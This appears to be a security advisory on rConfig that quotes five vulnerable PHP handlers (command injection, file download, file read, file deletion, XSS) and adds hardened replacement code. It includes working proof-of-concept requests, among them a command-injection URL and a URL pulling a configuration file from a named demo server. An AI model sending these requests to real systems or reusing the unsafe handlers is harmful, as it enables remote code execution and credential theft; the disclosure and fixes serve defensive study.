rConfig 3.1.1 <= 2.0 RCE & AFD & XSS Multiple Vulnerabilities
http://www.rconfig.com/
rConfig is a free, open-source network device configuration management utility that lets network engineers take frequent configuration snapshots of their network devices. rConfig is unique because you choose which commands to run against your devices: configure rConfig with the list of commands you wish to apply to a category of devices, add devices to the category, create a scheduled task, and rConfig does the rest. rConfig version 3 adds a Configuration Compliance Management utility for monitoring device configurations for policy compliance.
Vulnerabilities:
===========================================================================
===========================================================================
1. Remote Command Execution
File: lib/ajaxHandlers/ajaxArchiveFiles.php
<?php
// $_GET['path'] and $_GET['ext'] are concatenated straight into the command
// line below; neither is validated or escaped, so exec() runs whatever the
// request supplies.
$mainPath = $_GET['path'];
$archiveMainPath = $mainPath . "archive/";
$ext = "*." . $_GET['ext'];
$fullpath = $mainPath . $ext;
// create the archive dir if not already created
if (!is_dir($archiveMainPath)) {
    mkdir("$archiveMainPath");
}
$today = date("Ymd");
$commandString = "sudo -u apache zip -r -j " . $archiveMainPath . "filename" . $today . ".zip " . $mainPath . $ext;
exec($commandString);
PoC:
/rconfig/www/lib/ajaxHandlers/ajaxArchiveFiles.php?path=/&ext=|%20id
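A hardened rewrite of the archive handler, added here as an example; it is not rConfig's own code. It assumes the archive job only ever needs a subdirectory beneath a fixed data root (RCONFIG_DATA_ROOT and ALLOWED_EXTENSIONS are assumed names), so the `path` parameter becomes a relative subdirectory confined with realpath(), the extension is checked against an allow-list, the file list is expanded by PHP's glob() instead of the shell, and every argument reaching exec() passes through escapeshellarg(). The sudo prefix from the original is omitted.

```php
<?php
// Added example (not rConfig code): hardened replacement for the
// ajaxArchiveFiles.php logic. RCONFIG_DATA_ROOT and ALLOWED_EXTENSIONS are
// assumed values chosen for illustration.

const RCONFIG_DATA_ROOT  = '/var/www/rconfig/data';   // assumed base directory
const ALLOWED_EXTENSIONS = ['log', 'txt', 'cfg'];      // assumed allow-list

function archiveFiles(string $subdir, string $ext): array
{
    // 1. The extension must match an allow-list entry exactly, so shell
    //    metacharacters such as "|" can never reach the command line.
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return ['failure' => true, 'reason' => 'extension not permitted'];
    }

    // 2. Confine the directory to the data root. realpath() resolves "..",
    //    symlinks and duplicate separators, so a prefix check on its result
    //    is reliable; a missing directory yields false and is rejected.
    //    Embedded NUL bytes are rejected first because realpath() refuses them.
    if (strpos($subdir, "\0") !== false) {
        return ['failure' => true, 'reason' => 'invalid path'];
    }
    $base = realpath(RCONFIG_DATA_ROOT);
    $dir  = realpath(RCONFIG_DATA_ROOT . '/' . $subdir);
    if ($base === false || $dir === false
        || strpos($dir . '/', $base . '/') !== 0) {
        return ['failure' => true, 'reason' => 'path outside data root'];
    }

    $archiveDir = $dir . '/archive';
    if (!is_dir($archiveDir) && !mkdir($archiveDir, 0750, true)) {
        return ['failure' => true, 'reason' => 'cannot create archive dir'];
    }

    // 3. Build the file list in PHP rather than letting the shell expand a
    //    user-controlled glob, and quote every argument individually.
    $files = glob($dir . '/*.' . $ext);
    if ($files === false || $files === []) {
        return ['failure' => true, 'reason' => 'no matching files'];
    }
    $zip = sprintf('%s/filename%s.zip', $archiveDir, date('Ymd'));
    $cmd = 'zip -r -j ' . escapeshellarg($zip);
    foreach ($files as $f) {
        $cmd .= ' ' . escapeshellarg($f);
    }
    exec($cmd, $output, $status);

    return $status === 0
        ? ['success' => true, 'archive' => $zip]
        : ['failure' => true, 'reason' => 'zip exited with ' . $status];
}

// Handler entry point: read the two parameters and emit JSON, as the
// original handler family does.
if (PHP_SAPI !== 'cli') {
    header('Content-Type: application/json');
    echo json_encode(archiveFiles(
        (string)($_GET['path'] ?? ''),
        (string)($_GET['ext'] ?? '')
    ));
}
```

With this shape a request such as the PoC above fails at step 1 and is reported as a rejected extension rather than reaching exec(); the realpath() prefix check in step 2 also stops a `..` or symlink from pointing the archive job outside the data root.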
2. Arbitrary file download
File: /www/lib/crud/downloadFile.php
<?php
// from here http://www.finalwebsites.com/forums/topic/php-file-download
$path = $_SERVER['DOCUMENT_ROOT'] . "/path2file/"; // change the path to fit your website's document structure
// NOTE: $path is never used; the file is opened from the raw query parameter,
// so any path readable by the web server user can be fetched.
$fullPath = $_GET['download_file'];
if ($fd = fopen($fullPath, "r")) {
    $fsize = filesize($fullPath);
    $path_parts = pathinfo($fullPath);
    $ext = strtolower($path_parts["extension"]);
    switch ($ext) {
        case "pdf":
            header("Content-type: application/pdf"); // add here more headers for diff. extensions
            header("Content-Disposition: attachment; filename=\"" . $path_parts["basename"] . "\""); // use 'attachment' to force a download
            break;
        default:
            header("Content-type: application/octet-stream");
            header("Content-Disposition: filename=\"" . $path_parts["basename"] . "\"");
    }
    header("Content-length: $fsize");
    header("Cache-control: private"); // use this to open files directly
    while (!feof($fd)) {
        $buffer = fread($fd, 2048);
        echo $buffer;
    }
}
fclose($fd);
exit;
// example: place this kind of link into the document where the file download is offered:
// <a href="download.php?download_file=some_file.pdf">Download here</a>
?>
PoC v2:
http://demo.rconfig.com/v2/www/lib/crud/downloadFile.php?download_file=/home/r560544/demo/v2/config/config.inc.php
3. XSS:
http://demo.rconfig.com/v2/www/devicemgmt.php?deviceId=168&device=XSS
4. Arbitrary file read
File: lib/ajaxHandlers/ajaxGetFileByPath.php
<?php
// used to retrieve contents of the file specified in JS in devicemgmt.php
// $_GET['path'] is passed straight to file(); any file readable by the web
// server user is returned as a JSON array of lines.
$filepath = $_GET['path'];
if (file_exists($filepath)) {
    $fileArr = file($filepath);
} else {
    $fileArr = 'Failed';
}
echo json_encode($fileArr);
?>
5. Arbitrary File Deletion
File: lib/ajaxHandlers/ajaxDeleteAllLoggingFiles.php
<?php
// $_GET['path'] and $_GET['ext'] form an unrestricted glob pattern; every
// match the web server user can remove is unlinked.
$path = $_GET['path'];
$ext = "*." . $_GET['ext'];
$fullpath = $path . $ext;
foreach (glob($fullpath) as $v) {
    unlink($v);
}
// $ext already carries the "*." prefix, so this re-count globs "*.*.<ext>"
// and normally matches nothing, which makes the handler report success.
$fileCount = count(glob($path . '*.' . $ext));
if ($fileCount > 0) {
    $response = json_encode(array(
        'failure' => true
    ));
} else {
    $response = json_encode(array(
        'success' => true
    ));
}
echo $response;
?>
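Items 2, 4 and 5 share one root cause: a caller-supplied path is handed to fopen(), file() or glob() with no check that it lies inside a directory the handler is meant to serve. The following is an added example, not rConfig's code, of one path-confinement helper reused by hardened versions of all three handlers. RCONFIG_DATA_ROOT, DOWNLOADABLE_EXTS and DELETABLE_LOG_EXTS are assumed names and values; the helper treats the request parameter as a path relative to the data root, canonicalises it with realpath() and rejects anything that resolves outside that root.

```php
<?php
// Added example (not rConfig code): a shared path-confinement helper for
// hardened versions of downloadFile.php, ajaxGetFileByPath.php and
// ajaxDeleteAllLoggingFiles.php. The constants are assumed values.

const RCONFIG_DATA_ROOT  = '/var/www/rconfig/data';
const DOWNLOADABLE_EXTS  = ['pdf', 'txt', 'cfg'];
const DELETABLE_LOG_EXTS = ['log'];

/**
 * Resolve $userPath relative to $base and return the canonical path only if
 * it stays inside $base. Returns null for traversal, symlink escapes,
 * non-existent targets and embedded NUL bytes.
 */
function resolveInside(string $base, string $userPath): ?string
{
    if (strpos($userPath, "\0") !== false) {
        return null;
    }
    $realBase = realpath($base);
    $real     = realpath($base . '/' . $userPath);
    if ($realBase === false || $real === false) {
        return null;
    }
    // Compare with a trailing separator so "/data-old" does not match "/data".
    return strpos($real . '/', $realBase . '/') === 0 ? $real : null;
}

function extensionOf(string $path): string
{
    return strtolower(pathinfo($path, PATHINFO_EXTENSION));
}

/** Hardened downloadFile.php: streams a file only from inside the data root. */
function downloadFile(string $userPath): bool
{
    $real = resolveInside(RCONFIG_DATA_ROOT, $userPath);
    if ($real === null || !is_file($real)
        || !in_array(extensionOf($real), DOWNLOADABLE_EXTS, true)) {
        http_response_code(404);
        return false;
    }
    // Generic type plus nosniff: the browser downloads the file instead of
    // rendering it, which also keeps HTML-looking content from executing.
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($real) . '"');
    header('Content-Length: ' . filesize($real));
    header('X-Content-Type-Options: nosniff');
    readfile($real);
    return true;
}

/** Hardened ajaxGetFileByPath.php: returns the file's lines, or 'Failed'. */
function getFileLines(string $userPath)
{
    $real = resolveInside(RCONFIG_DATA_ROOT, $userPath);
    if ($real === null || !is_file($real)) {
        return 'Failed';
    }
    return file($real, FILE_IGNORE_NEW_LINES);
}

/** Hardened ajaxDeleteAllLoggingFiles.php: removes *.<ext> in one directory. */
function deleteLogFiles(string $userDir, string $ext): array
{
    $dir = resolveInside(RCONFIG_DATA_ROOT, $userDir);
    if ($dir === null || !is_dir($dir) || !in_array($ext, DELETABLE_LOG_EXTS, true)) {
        return ['failure' => true];
    }
    foreach (glob($dir . '/*.' . $ext) ?: [] as $file) {
        if (is_file($file)) {
            unlink($file);
        }
    }
    // Re-count with the same pattern that was deleted, so the result is honest.
    $remaining = count(glob($dir . '/*.' . $ext) ?: []);
    return $remaining > 0 ? ['failure' => true] : ['success' => true];
}
```

Each handler's entry point then becomes a one-liner that passes the request parameter to the matching function and encodes the return value, as the originals do. The extension allow-lists are deliberately separate per operation: a file that may be downloaded is not necessarily one that may be deleted.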
(there is much more)
===========================================================================
===========================================================================